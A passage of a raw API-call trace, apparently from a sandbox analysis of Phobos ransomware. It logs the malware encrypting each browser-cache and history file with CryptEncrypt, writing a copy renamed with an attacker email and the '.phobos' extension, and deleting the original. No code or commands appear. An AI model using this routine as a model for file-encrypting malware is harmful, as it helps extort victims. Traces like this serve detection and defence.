HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0168.111] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0168.111] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.111] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91, lpOverlapped=0x0) returned 1 [0168.112] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0, dwBufLen=0xa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0) returned 1 [0168.112] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa0, lpOverlapped=0x0) returned 1 [0168.113] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0168.113] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.113] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0168.113] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.113] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0168.113] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.113] CloseHandle (hObject=0x180) returned 1 [0168.113] CloseHandle (hObject=0x130) returned 1 [0168.113] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\desktop.ini")) returned 1 [0168.114] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0168.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017071220170713\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0168.115] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=32768) returned 1 [0168.115] CloseHandle (hObject=0x130) returned 1 [0168.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017071220170713\\index.dat")) returned 0x2026 [0168.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017071220170713\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017071220170713\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0168.115] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.115] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017071220170713\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0168.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0168.116] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.116] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8000, lpOverlapped=0x0) returned 1 [0168.325] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010, dwBufLen=0x8010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010) returned 1 [0168.326] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8010, lpOverlapped=0x0) returned 1 [0168.327] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0168.327] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.327] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0168.327] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.327] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0168.328] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.328] CloseHandle (hObject=0x130) returned 1 [0168.328] CloseHandle (hObject=0x180) returned 1 [0168.328] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017071220170713\\index.dat")) returned 1 [0168.329] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0168.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\528d82a2[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\528d82a2[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0168.331] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11979) returned 1 [0168.331] CloseHandle (hObject=0x180) returned 1 [0168.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\528d82a2[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\528d82a2[1].js")) returned 0x2020 [0168.332] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\528d82a2[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\528d82a2[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\528d82a2[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\528d82a2[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0168.332] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.332] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\528d82a2[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\528d82a2[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0168.333] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0168.333] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.333] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2ecb, lpOverlapped=0x0) returned 1 [0168.381] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2ed0, dwBufLen=0x2ed0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2ed0) returned 1 [0168.381] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2ed0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2ed0, lpOverlapped=0x0) returned 1 [0168.382] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0168.382] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.382] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0168.382] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.382] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0168.382] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.382] CloseHandle (hObject=0x180) returned 1 [0168.383] CloseHandle (hObject=0x130) returned 1 [0168.383] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\528d82a2[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\528d82a2[1].js")) returned 1 [0168.395] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0168.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3e3xc[2].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.452] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=309) returned 1 [0168.452] CloseHandle (hObject=0x190) returned 1 [0168.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3e3xc[2].png")) returned 0x2020 [0168.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3e3xc[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3e3xc[2].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.452] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.453] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3e3xc[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.453] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0168.453] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.453] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x135, lpOverlapped=0x0) returned 1 [0168.538] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x140, dwBufLen=0x140 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x140) returned 1 [0168.538] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x140, lpOverlapped=0x0) returned 1 [0168.538] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0168.538] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.538] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0168.538] CryptDestroyKey (hKey=0xa327e8) returned 1 [0168.539] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0168.539] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.539] CloseHandle (hObject=0x190) returned 1 [0168.539] CloseHandle (hObject=0x158) returned 1 [0168.539] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa3e3xc[2].png")) returned 1 [0168.540] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0168.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa42ep9[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.541] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=461) returned 1 [0168.541] CloseHandle (hObject=0x158) returned 1 [0168.541] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa42ep9[1].png")) returned 0x2020 [0168.541] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa42ep9[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa42ep9[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.542] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.542] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0168.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa42ep9[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.542] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0168.542] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0168.542] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1cd, lpOverlapped=0x0) returned 1 [0169.082] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1d0) returned 1 [0169.082] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1d0, lpOverlapped=0x0) returned 1 [0169.083] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0169.083] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0169.083] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0169.083] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0169.083] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0169.083] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0169.083] CloseHandle (hObject=0x158) returned 1 [0169.083] CloseHandle (hObject=0x190) returned 1 [0169.083] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa42ep9[1].png")) returned 1 [0169.106] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0169.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa8uco4[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0169.108] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=712) returned 1 [0169.108] CloseHandle (hObject=0x190) returned 1 [0169.108] GetFileAttributesW 